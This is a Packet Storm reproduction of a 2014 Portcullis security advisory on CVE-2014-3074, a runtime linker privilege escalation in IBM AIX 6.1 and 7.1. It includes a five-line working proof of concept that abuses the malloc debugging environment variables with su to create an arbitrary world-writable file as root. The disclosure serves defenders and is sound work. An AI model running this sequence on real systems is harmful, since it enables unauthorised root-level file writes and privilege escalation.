Exploit the possiblities

IBM AIX Runtime Linker Privilege Escalation

IBM AIX Runtime Linker Privilege Escalation
Posted Jul 9, 2014
Authored by Tim Brown | Site portcullis-security.com

IBM AIX versions 6.1 and 7.1 suffer from a runtime linker privilege escalation vulnerability.

tags | advisory
systems | aix
advisories | CVE-2014-3074
MD5 | 5ed90263296038d7960e8d8e007b1e6a

IBM AIX Runtime Linker Privilege Escalation

Change Mirror Download
Vulnerability title: Runtime Linker Allows Privilege Escalation Via
Arbitrary File Writes in IBM AIX
CVE: CVE-2014-3074
Vendor: IBM
Product: AIX
Affected version: AIX 6.1 and 7.1 and VIOS 2.2.*
Reported by: Tim Brown

Details:
It has been identified that the runtime linker allows privilege
escalation via arbitrary file writes with elevated privileges (SetGID
and SetUID programs). The following will cause a new file /etc/pwned to
be created with permissions of rw-rw-rw:

umask 0
MALLOCOPTIONS=buckets
MALLOCBUCKETS=number_of_buckets:8,bucket_statistics:/etc/pwned
export MALLOCOPTIONS MALLOCBUCKETS
su -

In instances where the output file exists, then the report_allocations
output will be appended to the existing file and the permissions preserved.

Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3074/

Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights
reserved worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered in
any way without the express written consent of Portcullis Computer
Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    22 Files
  • 2
    Nov 2nd
    28 Files
  • 3
    Nov 3rd
    10 Files
  • 4
    Nov 4th
    1 Files
  • 5
    Nov 5th
    5 Files
  • 6
    Nov 6th
    15 Files
  • 7
    Nov 7th
    15 Files
  • 8
    Nov 8th
    13 Files
  • 9
    Nov 9th
    9 Files
  • 10
    Nov 10th
    9 Files
  • 11
    Nov 11th
    3 Files
  • 12
    Nov 12th
    2 Files
  • 13
    Nov 13th
    15 Files
  • 14
    Nov 14th
    17 Files
  • 15
    Nov 15th
    19 Files
  • 16
    Nov 16th
    15 Files
  • 17
    Nov 17th
    19 Files
  • 18
    Nov 18th
    4 Files
  • 19
    Nov 19th
    2 Files
  • 20
    Nov 20th
    9 Files
  • 21
    Nov 21st
    15 Files
  • 22
    Nov 22nd
    23 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close